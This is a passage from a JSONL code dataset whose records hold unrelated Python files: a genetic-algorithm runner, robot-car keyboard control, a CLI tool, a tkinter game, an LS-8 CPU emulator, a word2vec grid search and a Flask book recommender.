0.9919224 ]\n [0.00616169 0.99383837]\n [0.00741947 0.99258053]\n [0.00708305 0.99291694]\n [0.00617239 0.99382764]\n]\n'''","sub_path":"detect_toxic_image_and_video/classifier_video.py","file_name":"classifier_video.py","file_ext":"py","file_size_in_byte":2339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"405869340","text":"from statistics import mean\nfrom timeit import default_timer as timer\nfrom lib.GeneticAlgoAPI import Population\n\n\ndef get_time_units(time):\n    \"\"\" time is in seconds \"\"\"\n    unit = \"seconds\"\n    if time <= 1e-1:\n        time *= 1e3\n        unit = \"milliseconds\"\n    elif time > 60:\n        time /= 60\n        
unit = \"minutes\"\n if time > 60:\n time /= 60\n unit = \"hours\"\n return time, unit\n\n\ndef evaluate(population, gen, ga):\n fittest = population.get_fittest()\n f = fittest.get_fitness()\n m = mean(ch.get_fitness() for ch in population)\n print(\"gen: {} fit: {} mean: {:.2f} chromo: {}\".format(str(gen), f, m, str(fittest)))\n # print(\"generation: {}, best score: {}, mean score: {:.2f}, chromosome: {}\".format(str(gen), f, m, str(fittest)))\n # print(\"gen: {} fit: {}\".format(str(gen), ga.max_score))\n\n\ndef run(ga, population, early_conv_avoid):\n start = timer()\n\n early_conv_avoid.before_start(ga)\n ga.set_fitness_scores(population)\n gen = 0\n evaluate(population, gen, ga)\n while not ga.get_stop_cond(population):\n gen += 1\n early_conv_avoid.start_generation(gen, ga, population)\n\n # print(1)\n elite = ga.apply_elitism(population)\n # print(2)\n parents = ga.selection(population)\n # print(3)\n population = ga.crossover(parents, population.get_size())\n # print(4)\n population = ga.mutation(population)\n # print(5)\n population.add_chromosome(elite)\n # print(6)\n ga.set_fitness_scores(population)\n\n evaluate(population, gen, ga)\n\n # deal with early convergence\n early_conv_avoid.end_generation(gen, ga, population)\n\n end = timer()\n return end - start, population.get_fittest(), gen\n\n\ndef build_and_run(early_conv_avoid, mutation_rate, crossover_rate, population_size, elitism_count, ga_type, chromo_type):\n ga = ga_type(elitism_count, mutation_rate, crossover_rate, population_size)\n population = Population()\n population.init_population(population_size, chromo_type)\n\n print(ga)\n print(early_conv_avoid)\n return run(ga, population, early_conv_avoid)\n\n","sub_path":"ex2/lib/GeneticAlgoAPI/run_ga.py","file_name":"run_ga.py","file_ext":"py","file_size_in_byte":2161,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"331737050","text":"import signal\nimport sys\nimport time\nimport _thread\nfrom platform_modules.motor_controller import MotorController\nfrom platform_modules.lcd_driver import LCD\nfrom platform_modules.button_reader import ButtonReader\nfrom platform_modules.car_guard import CarGuard\nfrom platform_modules.camera import Camera\nfrom utils.keyboard_getch import _Getch\nimport global_storage as gs\nimport config as cf\n\n\n# Init camera\ncamera = Camera()\ncamera.start()\n\n# Init LCD\nlcd = LCD(cf.LCD_ADDRESS)\n\n# Init button reader\nbutton_reader = ButtonReader()\nbutton_reader.start()\n\n# Init motor controller\nmotor_controller = MotorController()\nmotor_controller.start()\n\n# Car guard\n# Stop car when hitting obstacle or when user presses button 4\nguard = CarGuard()\nguard.start()\n\n# UI thread\ndef ui_thread():\n # Save last value of buttons\n last_button_1 = False\n last_button_2 = False\n last_button_3 = False\n last_button_4 = False\n last_button_ss1 = False\n last_button_ss2 = False\n last_time_update_screen = time.time()\n\n while True:\n # Determine pressed buttons\n pressed_buttons = []\n if gs.button_1 and not last_button_1:\n pressed_buttons.append(\"1\")\n if gs.button_2 and not last_button_2:\n pressed_buttons.append(\"2\")\n if gs.button_3 and not last_button_3:\n pressed_buttons.append(\"3\")\n if gs.button_4 and not last_button_4:\n pressed_buttons.append(\"4\")\n if gs.button_ss1 and not last_button_ss1:\n pressed_buttons.append(\"S1\")\n if gs.button_ss2 and not last_button_ss2:\n pressed_buttons.append(\"S2\")\n\n if any([s for s in pressed_buttons if \"1\" == s]):\n 
gs.record_videos = not gs.record_videos\n\n if any([s for s in pressed_buttons if \"3\" == s]):\n gs.emergency_stop = False\n\n if time.time() - last_time_update_screen > 1:\n lcd.lcd_clear()\n lcd.lcd_display_string(\"Manual mode:\", 1)\n lcd.lcd_display_string(\"1:RECORD,4:STOP\", 2)\n \n if gs.emergency_stop:\n lcd.lcd_display_string(\"EMERGENCY!!!\", 4)\n\n if gs.record_videos:\n lcd.lcd_display_string(\"[.] Recording...\", 3)\n\n last_time_update_screen = time.time()\n\n # Update values\n last_button_1 = gs.button_1\n last_button_2 = gs.button_2\n last_button_3 = gs.button_3\n last_button_4 = gs.button_4\n last_button_ss1 = gs.button_ss1\n last_button_ss2 = gs.button_ss2\n \n time.sleep(0.2)\n\n_thread.start_new_thread(ui_thread, ())\n\n# Manual control using keyboard\ngetch = _Getch()\nprint(\"Use keyboard to control: wasd\")\nprint(\"Quit: q\")\nwhile not gs.exit_signal:\n key = getch()\n if key == \"w\":\n if gs.speed < 0:\n gs.speed = 0\n else:\n gs.speed = min(cf.MAX_SPEED, gs.speed + 2)\n elif key == \"s\":\n if gs.speed > 0:\n gs.speed = 0\n else:\n gs.speed = max(-cf.MAX_SPEED, gs.speed - 2)\n elif key == \"a\":\n if gs.steer > 0:\n gs.steer = 0\n else:\n gs.steer = max(cf.MIN_ANGLE, gs.steer - 5)\n elif key == \"d\":\n if gs.steer < 0:\n gs.steer = 0\n else:\n gs.steer = min(cf.MAX_ANGLE, gs.steer + 5)\n elif key == \"i\": # Remove emergency stop state\n gs.emergency_stop = False\n elif key == \"v\":\n gs.record_videos = not gs.record_videos\n print(\"Record video: \" + str(gs.record_videos))\n elif key == \"q\":\n gs.exit_signal = True\n break\n\n print(\"Speed: {} Steer: {}\".format(gs.speed, gs.steer))\n\n# camera.join()\n# motor_controller.join()\n# guard.join()\n# button_reader.join()\n# remote_controller.join()\n","sub_path":"run_manual_control_keyboard.py","file_name":"run_manual_control_keyboard.py","file_ext":"py","file_size_in_byte":3752,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"504705791","text":"# -*- coding: utf-8 -*-\n\nimport argparse\nimport locale\nimport os\nimport shutil\nimport sys\nimport uuid\n\nfrom f2format.core import f2format\n\n# multiprocessing may not be supported\ntry: # try first\n import multiprocessing\nexcept ImportError:\n multiprocessing = None\nelse: # CPU number if multiprocessing supported\n if os.name == 'posix' and 'SC_NPROCESSORS_CONF' in os.sysconf_names:\n CPU_CNT = os.sysconf('SC_NPROCESSORS_CONF')\n elif 'sched_getaffinity' in os.__all__:\n CPU_CNT = len(os.sched_getaffinity(0)) # pylint: disable=E1101\n else:\n CPU_CNT = os.cpu_count() or 1\nfinally: # alias and aftermath\n mp = multiprocessing\n del multiprocessing\n\n# backport compatibility\ntry:\n import pathlib2 as pathlib\nexcept ImportError:\n import pathlib\n\n# version string\n__version__ = '0.4.0.post2'\n\n# macros\n__cwd__ = os.getcwd()\n__archive__ = os.path.join(__cwd__, 'archive')\n__encoding__ = locale.getpreferredencoding()\n\n\ndef get_parser():\n parser = argparse.ArgumentParser(prog='f2format',\n usage='f2format [options] ',\n description='Convert f-string to str.format for Python 3 compatibility.')\n parser.add_argument('-V', '--version', action='version', version=__version__)\n\n archive_group = parser.add_argument_group(title='archive options',\n description=\"duplicate original files in case there's any issue\")\n archive_group.add_argument('-n', '--no-archive', action='store_true',\n help='do not archive original files')\n archive_group.add_argument('-p', '--archive-path', action='store', 
default=__archive__, metavar='PATH',\n                               help='path to archive original files (default is %r)' % __archive__)\n\n    convert_group = parser.add_argument_group(title='convert options',\n                                              description='compatibility configuration for non-unicode files')\n    convert_group.add_argument('-c', '--encoding', action='store', default=__encoding__, metavar='CODING',\n                               help='encoding to open source files (default is %r)' % __encoding__)\n\n    parser.add_argument('file', nargs='*', metavar='SOURCE', default=__cwd__,\n                        help='python source files and folders to be converted (default is %r)' % __cwd__)\n\n    return parser\n\n\ndef main():\n    \"\"\"Entry point for f2format.\"\"\"\n    parser = get_parser()\n    args = parser.parse_args()\n\n    # set up variables\n    ARCHIVE = args.archive_path\n    archive = (not args.no_archive)\n    os.environ['F2FORMAT_ENCODING'] = args.encoding\n\n    def find(root):\n        \"\"\"Recursively find all files under root.\"\"\"\n        flst = list()\n        temp = os.listdir(root)\n        for file in temp:\n            path = os.path.join(root, file)\n            if os.path.isdir(path):\n                flst.extend(find(path))\n            elif os.path.isfile(path):\n                flst.append(path)\n            elif os.path.islink(path):  # exclude symbolic links\n                continue\n        yield from flst\n\n    def rename(path):\n        stem, ext = os.path.splitext(path)\n        name = '%s-%s%s' % (stem, uuid.uuid4(), ext)\n        return os.path.join(ARCHIVE, name)\n\n    # make archive directory\n    if archive:\n        pathlib.Path(ARCHIVE).mkdir(parents=True, exist_ok=True)\n\n    # fetch file list from the parsed 'file' argument (its default is a single string)\n    filelist = list()\n    paths = args.file if isinstance(args.file, list) else [args.file]\n    for path in paths:\n        if os.path.isfile(path):\n            if archive:\n                dest = rename(path)\n                pathlib.Path(dest).parent.mkdir(parents=True, exist_ok=True)\n                shutil.copy(path, dest)\n            filelist.append(path)\n        if os.path.isdir(path):\n            if archive:\n                shutil.copytree(path, rename(path))\n            filelist.extend(find(path))\n\n    # check if file is Python source code\n    def ispy(file): return (os.path.isfile(file) and (os.path.splitext(file)[1] in ('.py', '.pyw')))\n    filelist = set(filter(ispy, filelist))\n\n    # if no file supplied\n    if len(filelist) == 0:\n        parser.error('argument PATH: no valid source file found')\n\n    # process files\n    if mp is None:\n        [f2format(filename) for filename in filelist]\n    else:\n        mp.Pool(processes=CPU_CNT).map(f2format, filelist)\n\n\nif __name__ == '__main__':\n    sys.exit(main())\n","sub_path":"src/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":4444,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"554876164","text":"from tkinter import *\nfrom tkinter.messagebox import *\nfrom time import *\n\n\nclass Naughty_circle:\n    def __init__(self, t, root, canvas, canvas_width, canvas_height):\n        self.start_time = t\n        self.root = root\n        self.canvas = canvas\n        self.canvas_width = canvas_width\n        self.canvas_height = canvas_height\n        self.x = canvas_width/2 - 25\n        self.y = canvas_height/2 - 25\n        self.length = 50\n        self.oval = self.canvas.create_oval(self.x, self.y, self.x + self.length, self.y + self.length, fill='blue')\n\n    def move(self, x_velocity, y_velocity):\n        self.x += x_velocity\n        self.y += y_velocity\n        self.canvas.move(self.oval, x_velocity, y_velocity)\n\n    def motion(self, event):\n        x, y = event.x, event.y\n        gap = 20\n        value = 0\n        if self.x - gap <= x <= self.x and self.y <= y <= self.y + self.length:  # horizontal right\n            self.move(15, 0)\n        if self.x + self.length <= x <= self.x + self.length + gap and self.y <= y <= self.y + self.length:  # horizontal left\n            self.move(-15, 0)\n        if self.y - gap - 10 <= y <= self.y and self.x <= x <= self.x + 
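# Illustrative sketch (not from the original file; 'archive' is an invented demo
# directory name): rename() above avoids collisions in the archive directory by
# injecting a uuid4 between a file's stem and its extension.
import os
import uuid

def archive_name(path, archive_dir='archive'):
    stem, ext = os.path.splitext(path)
    return os.path.join(archive_dir, '%s-%s%s' % (stem, uuid.uuid4(), ext))

# e.g. 'src/app.py' -> 'archive/src/app-<uuid>.py'; two calls never clash
assert archive_name('src/app.py') != archive_name('src/app.py')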
self.length: # vertical down\n self.move(0, 15)\n if self.y + self.length <= y <= self.y + self.length + gap and self.x <= x <= self.x + self.length: # vertical up\n self.move(0, -15)\n if self.x - gap <= x <= self.x and self.y - gap - 10 <= y <= self.y: # diagonal down right\n self.move(15, 15)\n if self.x - gap <= x <= self.x and self.y + self.length <= y <= self.y + self.length + gap: # diagonal up right\n self.move(15, -15)\n if self.x + self.length <= x <= self.x + self.length + gap and self.y - gap - 10 <= y <= self.y: # diagonal down left\n self.move(-15, 15)\n if self.x + self.length <= x <= self.x + self.length + gap and self.y + self.length <= y <= self.y + self.length + gap: # diagonal up left\n self.move(-15, -15)\n if self.x + self.length <= 0: # if reach left border\n self.move(self.canvas_width, 0)\n if self.x >= self.canvas_width: # if reach right border\n self.move(-self.canvas_width, 0)\n if self.y + self.length <= 0: # if reach top border\n self.move(0, self.canvas_height)\n if self.y >= self.canvas_height: # if reach bottom border\n self.move(0, -self.canvas_height)\n if self.x <= x <= self.x + self.length and self.y <= y <= self.y + self.length: # if player manage to control mouse cursor to reach circle\n duration = time() - self.start_time\n if duration >= 60:\n showinfo(\"Greetings from above\", \"Congratulations, beloved user, you just spent \" + \"%.1f\" % (duration/60) + \" minutes on catching a circle!\\nHere's a hug ... lonely f#$%\")\n else:\n showinfo(\"Greetings from above\", \"Congratulations, beloved user, you just spent \" + \"%.1f\" % duration + \" seconds on catching a circle!\\nHere's a hug ... lonely f#$%\")\n self.root.destroy()\n\n\nclass Arena:\n def __init__(self):\n self.t = time()\n self.root = Tk()\n self.root.wm_title(\"Catch the circle\")\n self.width = 600\n self.height = 600\n self.canvas = Canvas(self.root, width=self.width, height=self.height)\n self.canvas.pack()\n self.canvas.focus_set()\n self.canvas.create_rectangle(0, 0, self.width, self.height, fill='white') # background\n self.conscious_circle()\n self.root.update()\n self.root.mainloop()\n\n def conscious_circle(self):\n circle = Naughty_circle(self.t, self.root, self.canvas, self.width, self.height)\n self.canvas.bind('', circle.motion)\n\nArena()","sub_path":"Random Program/Self-conscious Circle/Naughty_circle.py","file_name":"Naughty_circle.py","file_ext":"py","file_size_in_byte":3775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"} +{"seq_id":"83997828","text":"\"\"\"CPU functionality.\"\"\"\n\nimport sys\n\nclass CPU:\n \"\"\"Main CPU class.\"\"\"\n\n def __init__(self):\n \"\"\"Construct a new CPU.\"\"\"\n self.ram = [0] * 256 # Holds 256 bytes of memory \n self.reg = [0] * 8 # Holds 8 general-purpose registers\n self.pc = 0 # Program Counter, address of the currently executing instruction\n self.ldi = 0b10000010\n self.prn = 0b01000111\n self.hlt = 0b00000001\n self.mul = 0b10100010\n self.add = 0b10100000\n self.push = 0b01000101\n self.pop = 0b01000110\n self.call = 0b01010000\n self.ret = 0b00010001\n self.cmp = 0b10100111\n self.jmp = 0b01010100\n self.jeq = 0b01010101\n self.jne = 0b01010110\n self.running = True\n self.branchtable = {\n self.ldi: self.handle_load_immediate,\n self.prn: self.handle_print,\n self.hlt: self.handle_halt,\n self.mul: self.handle_multiply,\n self.push: self.handle_push,\n self.pop: self.handle_pop,\n self.call: self.handle_call,\n self.ret: self.handle_return,\n self.add: self.handle_add,\n 
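            # (Descriptive note: run() fetches each instruction byte and looks it
            # up in this branchtable instead of walking an if/elif chain, so a new
            # opcode costs one dict entry plus one handler method.)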
self.cmp: self.handle_compare,\n            self.jmp: self.handle_jump,\n            self.jeq: self.handle_jeq,\n            self.jne: self.handle_jne\n        }\n        self.sp = 7 # Stack Pointer\n        self.reg[self.sp] = 0xFF # Stack pointer starts at the top of memory (0xFF)\n        self.flag = 0 # FL bits: 00000LGE\n        \n\n        \n    def load(self, file):\n        \"\"\"Load a program into memory.\"\"\"\n\n        address = 0\n        \n        program = open(file, \"r\")\n        \n        for line in program:\n            line = line.split(\"#\")\n            line = line[0].strip()\n            if line == \"\":\n                continue\n            self.ram[address] = int(line, 2)\n            address += 1\n        \n    def alu(self, op, reg_a, reg_b):\n        \"\"\"ALU operations.\"\"\"\n        if op == \"ADD\":\n            self.reg[reg_a] += self.reg[reg_b]\n        elif op == \"MUL\":\n            self.reg[reg_a] *= self.reg[reg_b]\n        elif op == \"SUB\":\n            self.reg[reg_a] -= self.reg[reg_b]\n        elif op == \"DIV\":\n            self.reg[reg_a] /= self.reg[reg_b]\n        elif op == \"CMP\":\n            if self.reg[reg_a] == self.reg[reg_b]:\n                # Set E Flag to 1: 00000001\n                self.flag = 1\n            elif self.reg[reg_a] < self.reg[reg_b]:\n                # Set L Flag to 1: 00000100\n                self.flag = 4\n            elif self.reg[reg_a] > self.reg[reg_b]:\n                # Set G Flag to 1: 00000010\n                self.flag = 2\n            else:\n                self.flag = 0\n        else:\n            raise Exception(\"Unsupported ALU operation\")\n\n    def trace(self):\n        \"\"\"\n        Handy function to print out the CPU state. You might want to call this\n        from run() if you need help debugging.\n        \"\"\"\n\n        print(f\"TRACE: %02X | %02X %02X %02X |\" % (\n            self.pc,\n            #self.fl,\n            #self.ie,\n            self.ram_read(self.pc),\n            self.ram_read(self.pc + 1),\n            self.ram_read(self.pc + 2)\n        ), end='')\n\n        for i in range(8):\n            print(\" %02X\" % self.reg[i], end='')\n\n        print()\n    \n    def ram_read(self, mar):\n        # Memory Address Register (MAR): holds the memory address we're reading or writing\n        return self.ram[mar]\n    \n    def ram_write(self, mar, mdr):\n        # Memory Data Register (mdr), holds the value to write or the value just read\n        self.ram[mar] = mdr\n\n    def handle_load_immediate(self):\n        # Handles LDI: loads an immediate value into a register\n        operand_a = self.ram_read(self.pc+1)\n        operand_b = self.ram_read(self.pc+2)\n        self.reg[operand_a] = operand_b\n        self.pc += 3\n    \n    def handle_print(self):\n        # Handles print\n        operand_a = self.ram_read(self.pc+1)\n        print(self.reg[operand_a])\n        self.pc += 2\n    \n    def handle_halt(self):\n        # Stops program\n        self.running = False\n    \n    def handle_multiply(self):\n        # Multiplies\n        operand_a = self.ram_read(self.pc+1)\n        operand_b = self.ram_read(self.pc+2)\n        self.alu(\"MUL\", operand_a, operand_b)\n        \n        self.pc += 3\n    \n    def handle_add(self):\n        operand_a = self.ram_read(self.pc+1)\n        operand_b = self.ram_read(self.pc+2)\n        self.alu(\"ADD\", operand_a, operand_b)\n        \n        self.pc += 3\n    \n    def handle_push(self):\n        # Decrement stack pointer\n        self.reg[self.sp] -= 1\n        \n        # Copies value from register into memory\n        reg_num = self.ram[self.pc+1]\n        value = self.reg[reg_num] # Being pushed\n        \n        address = self.reg[self.sp]\n        \n        # Stores the value on the stack\n        self.ram[address] = value\n        \n        self.pc += 2\n    \n    def handle_pop(self):\n        address = self.reg[self.sp]\n        value = self.ram[address]\n        \n        # Copies value from memory into register\n        reg_num = self.ram[self.pc+1]\n        self.reg[reg_num] = value # Being popped off of stack\n        \n        # Increment stack pointer\n        self.reg[self.sp] += 1\n        \n        self.pc += 2\n    \n    def handle_call(self):\n        # Computes return address\n        return_address = self.pc+2\n        \n        # Pushes to stack\n        self.reg[self.sp] -= 1\n        self.ram[self.reg[self.sp]] = return_address\n        \n        # Sets program counter to the value in the given register\n        register_number = self.ram[self.pc+1]\n        destination_address = self.reg[register_number]
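# Illustrative sketch (not from the original file): the FL byte convention noted
# above ("00000LGE") — CMP sets exactly one of the L, G, E bits, and conditional
# jumps test them with bit masks.
FL_E, FL_G, FL_L = 0b001, 0b010, 0b100

def cmp_flags(a, b):
    if a == b:
        return FL_E
    return FL_L if a < b else FL_G

assert cmp_flags(3, 3) == 0b001     # equal
assert cmp_flags(2, 5) == 0b100     # less-than
assert cmp_flags(5, 2) & FL_G       # greater-than bit set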
\n        \n        self.pc = destination_address\n        \n        # print(\"REG\", self.reg)\n        # print(\"RAM\", self.ram)\n        # print(\"SP\", self.sp)\n        # print(\"Return address\", return_address)\n        # print(\"register_number\", register_number)\n        # print(\"destination_address\", destination_address)\n        \n    def handle_return(self):\n        # Pop return address from top of stack\n        return_address = self.ram[self.reg[self.sp]]\n        # print(\"return\", return_address)\n        self.reg[self.sp] += 1\n        \n        # Sets program counter\n        self.pc = return_address\n        \n        # print(\"REG\", self.reg)\n        # print(\"RAM\", self.ram)\n        # print(\"SP\", self.sp)\n        # print(\"Return address\", return_address)\n        # print(\"register_number\", register_number)\n        # print(\"destination_address\", destination_address)\n    \n    def handle_compare(self):\n        operand_a = self.ram_read(self.pc+1)\n        operand_b = self.ram_read(self.pc+2)\n        \n        self.alu(\"CMP\", operand_a, operand_b)\n        \n        self.pc += 3\n    \n    def handle_jump(self):\n        # Jump to the address stored in the given register\n        operand_a = self.ram_read(self.pc+1)\n        address = self.reg[operand_a]\n        \n        # Set the program counter to the address stored in the given register\n        self.pc = address\n    \n    def handle_jeq(self):\n        # If equal (E) flag is set to true (1)\n        if self.flag == 1:\n            # Jump to the address stored in the given register\n            self.handle_jump()\n        \n        else:\n            self.pc += 2\n    \n    def handle_jne(self):\n        # If the E flag is clear (false, 0), jump\n        # &: Each bit of the output is 1 if the corresponding bit of x AND of y is 1, otherwise it's 0. \n        # ~: Switches each 1 for a 0 and each 0 for a 1.\n        if not (self.flag & 1):\n            # jump to the address stored in the given register.\n            self.handle_jump()\n        else:\n            self.pc += 2\n    \n    def run(self):\n        \"\"\"Run the CPU.\"\"\"\n\n        while self.running:\n            # Instruction Register\n            ir = self.ram_read(self.pc)\n            \n            if self.branchtable.get(ir):\n                self.branchtable[ir]()\n            else:\n                print(\"Unknown instruction\")\n                sys.exit(1)\n        \n        #self.trace()","sub_path":"ls8/cpu.py","file_name":"cpu.py","file_ext":"py","file_size_in_byte":8081,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"581357088","text":"from gensim.models import Word2Vec\nfrom gensim.models.callbacks import CallbackAny2Vec\nfrom gensim.test.utils import get_tmpfile\nfrom gensim.models.word2vec import LineSentence\nimport nltk\nfrom tqdm import tqdm\nimport os\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.base import BaseEstimator\nimport scipy.stats\nimport numpy as np\nimport itertools\nimport pandas as pd\nfrom sklearn.model_selection import ParameterGrid\nimport json\n\n\nclass EpochSaver(CallbackAny2Vec):\n    '''Callback to save model after each epoch.'''\n\n    def __init__(self, path_prefix):\n        self.path_prefix = path_prefix\n        self.epoch = 0\n        os.makedirs(self.path_prefix, exist_ok=True)\n\n    def on_epoch_end(self, model):\n        savepath = get_tmpfile(\n            '{}_epoch{}.model'.format(self.path_prefix, self.epoch)\n        )\n        model.save(savepath)\n        print(\n            \"Epoch saved: {}\".format(self.epoch + 1),\n            \"Starting next epoch\"\n        )\n        self.epoch += 1\n\ndef senseEmbeddings(word, dictionary):\n    '''returns the sense embeddings for a given word'''\n\n    word = word.split()\n    word = \"_\".join(word) if len(word)>1 else word[0]\n    senses = []\n\n    for w in dictionary:\n        wordC = \"_\".join(w.split(\":\")[0].split(\"_\")[:-1])\n        if word.lower() == wordC.lower():\n            senses.append(w)\n\n    return senses\n\ndef wordSimilarity(w1, w2, dictionary, model):\n    '''takes two words and outputs a similarity score'''
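# Illustrative sketch (not from the original file; names are invented for the
# demo): wordSimilarity scores two words as the *maximum* similarity over all
# pairs of their sense embeddings, which is what itertools.product + max gives.
import itertools

def max_pair_score(senses1, senses2, sim):
    score = -1.0
    for s1, s2 in itertools.product(senses1, senses2):
        score = max(score, sim(s1, s2))
    return score

# toy similarity: 1.0 when the senses share a prefix before '#', else 0.0
toy_sim = lambda a, b: 1.0 if a.split('#')[0] == b.split('#')[0] else 0.0
assert max_pair_score(['bank#1', 'bank#2'], ['bank#3'], toy_sim) == 1.0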
\n\n    w1_senses = senseEmbeddings(w1, dictionary)\n    w2_senses = senseEmbeddings(w2, dictionary)\n    score = - 1.0\n\n    if len(w1_senses)!=0 and len(w2_senses)!=0:\n        combinations = itertools.product(w1_senses, w2_senses)\n        for s1, s2 in combinations:\n            score = max(score, model.wv.similarity(s1, s2))\n\n    return score\n\nclass Word2VecModel(BaseEstimator):\n    '''hyperparameter grid search'''\n    def __init__(self, window=5, min_count=3, size=400, alpha=0.01, sample = 1e-5, negative=9, epochs = 15):\n        self.w2v_model = None\n        self.window = window\n        self.min_count = min_count\n        self.size = size\n        self.alpha = alpha\n        self.sample = sample\n        self.epochs = epochs\n        self.negative = negative\n\n    def fit(self, data):\n        '''model training'''\n        # Initialize model\n        self.w2v_model = Word2Vec(size=self.size,\n                            window=self.window,\n                            alpha=self.alpha,\n                            min_count = self.min_count,\n                            workers = 8,\n                            sample = self.sample,\n                            negative = self.negative,\n                            sg = 1)\n        # Build vocabulary\n        self.w2v_model.build_vocab(data)\n\n        self.w2v_model.save(\"../resources/word2vec_final_lower_skip.model\")\n\n        # Train model\n        self.w2v_model.train(sentences = data,\n                        total_examples=self.w2v_model.corpus_count,\n                        epochs=self.epochs,\n                        callbacks = [EpochSaver(\"./checkpoints\")])\n        self.w2v_model.wv.save_word2vec_format('../resources/embeddings_final_lower_skip.vec', binary=False)\n        return self\n\n    def score(self, gold):\n        '''scoring function based on word similarity resulting in a correlation score'''\n        vocab = self.w2v_model.wv.vocab\n        dictionary = list(vocab.keys())\n        gold['cosine'] = gold.apply(lambda row: wordSimilarity(row['Word 1'],\n                                                               row['Word 2'],\n                                                               dictionary,\n                                                               self.w2v_model),axis=1)\n\n        correlation_2, p2 = scipy.stats.spearmanr(gold['Human (mean)'], gold['cosine'])\n        return correlation_2\n\n\ndef GridSearch(hyperparameters, corpora):\n    '''performs a grid search operation and returns the best hyperparameters based on a correlation score'''\n    best_score = - 1\n    gold = pd.read_csv('../dataset/combined.tab', delimiter = '\\t')\n    grid = ParameterGrid(hyperparameters)\n    best_grid = None\n    print(\"number of combinations: {}\\n\".format(len(list(grid))))\n\n    grids = []\n    for current_grid in tqdm(grid):\n        #model\n        current_model = Word2VecModel(**current_grid)\n        current_model.fit(corpora)\n        current_score = current_model.score(gold)\n        del current_model\n\n        #updating and writing\n        current_grid.update({\"correlation:\":current_score})\n        grids.append(current_grid)\n\n        print(current_grid)\n\n        if current_score > best_score:\n            print(\"better: \", current_score)\n            best_score = current_score\n            best_grid = current_grid\n\n    return best_grid, grids\nhyperparameters = {'window' : [4, 5],\n          'min_count' : [1, 3],\n          'size' : [100, 300],\n          'negative':[13],\n          'alpha' : [0.09, 0.001],\n          'epochs': [50]}\n\nfinal_hyperparameters = {'window' : [5],\n          'min_count' : [3],\n          'size' : [100],\n          'negative':[13],\n          'alpha' : [0.09],\n          'epochs': [50]}\n\nif __name__ == '__main__':\n    path_to_corpus = '../dataset/code_embedding/.txt'\n\n    #load\n    sentences = LineSentence(path_to_corpus)\n\n    #search and train\n    best_grid, grids = GridSearch(final_hyperparameters, sentences)\n\n    #saving; commented out for the final hyperparameters\n    # with open(\"../resources/gridsearch7.json\", 'w') as f1:\n    #     for grid in grids:\n    #         json.dump(grid, f1)\n\n    print(\"GridSearch complete: \", 
best_grid)\n","sub_path":"embedding_algorithms/sensEmbedd_1/code/grid_search.py","file_name":"grid_search.py","file_ext":"py","file_size_in_byte":5725,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"554382939","text":"import os\nimport sys\nimport logging\nimport sqlalchemy\nimport rollbar\nfrom pythonjsonlogger import jsonlogger\nfrom sqlalchemy.orm import sessionmaker, scoped_session\nfrom newrelic.agent import initialize as newrelic_initialize\n\n\ndef handle_exception(exc_type, exc_value, exc_traceback):\n    logging.exception({\n        \"message\": \"caught_exception\",\n        \"exc_type\": exc_type,\n        \"exc_value\": exc_value,\n        \"traceback\": exc_traceback\n    })\n    rollbar.report_exc_info((exc_type, exc_value, exc_traceback))\n\n\ndef setup_raygun_handler():\n    # despite the legacy name, this configures Rollbar error reporting\n    rollbar.init(os.getenv(\"ROLLBAR_TOKEN\"), environment=os.environ.get(\"QUBIT_ENVIRONMENT\", \"test\"))\n    sys.excepthook = handle_exception\n\n\ndef setup_newrelic():\n    if os.environ.get(\"QUBIT_ENVIRONMENT\", \"test\") == \"gcloud\":\n        newrelic_initialize(\"/etc/shark/newrelic.ini\", \"production\")\n\n\ndef setup_logging():\n    logger = logging.getLogger()\n\n    logHandler = logging.StreamHandler()\n    formatter = jsonlogger.JsonFormatter()\n    logHandler.setFormatter(formatter)\n    logger.addHandler(logHandler)\n    logger.setLevel(logging.DEBUG)\n\n\ndef setup_database():\n    database_url = os.getenv(\"DATABASE_URL\")\n    engine = sqlalchemy.create_engine(database_url)\n    ssession = scoped_session(sessionmaker(bind=engine))\n    return ssession\n","sub_path":"shark/common/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":1293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"57"}
{"seq_id":"648863134","text":"from flask import render_template\nfrom flask import request\nfrom flaskapp import app\nfrom flaskapp.rectools import get_metadata\nfrom flaskapp.rectools import get_book_to_book_recs\nimport numpy as np\nimport pandas as pd\nimport pickle\nfrom lightfm import LightFM\nimport time\nimport random\n\n# load the recommender (model), and maps between matrices and book IDs\nwith open('opt_model.p', 'rb') as f:\n    model = pickle.load(f)\nwith open('idx_to_bid.p', 'rb') as f:\n    idx_to_bid = pickle.load(f)\nwith open('bid_to_idx.p', 'rb') as f:\n    bid_to_idx = pickle.load(f)\n\n# \"with\" unnecessary here; Pandas closes the file after reading\nbooks_df = pd.read_csv('./data/books.csv')\n\ndef random_ids():\n    now = int(time.time()*100)\n    random.seed(now)\n    seed_book_idxs = [random.randrange(10),\n                      random.randrange(10, 100),\n                      random.randrange(100, 1000),\n                      random.randrange(1000, len(bid_to_idx))]\n    sorted_keys = list(bid_to_idx.keys())\n    sorted_keys.sort()\n    seed_book_ids = [sorted_keys[idx] for idx in seed_book_idxs]\n    return seed_book_ids\n\n@app.route('/')\n@app.route('/index')\ndef index():\n    return render_template(\"index.html\")\n\n@app.route('/otak')\ndef otak():\n    # having a while loop provides robustness during development/debugging\n    n_seed_books = 0\n    while n_seed_books < 4:\n        seed_book_ids = random_ids()\n        seed_books = get_metadata( seed_book_ids, books_df, len(seed_book_ids))\n        n_seed_books = len(seed_books)\n        print('Got {} seed books'.format(n_seed_books))\n        print(seed_books)\n    return render_template(\"otak.html\", seed_books = seed_books) \n\n@app.route('/output')\ndef otak_output():\n    seed_book_id = int(request.args.get('bid'))\n    recs = get_book_to_book_recs(seed_book_id, bid_to_idx, idx_to_bid, model)\n    # the seed book 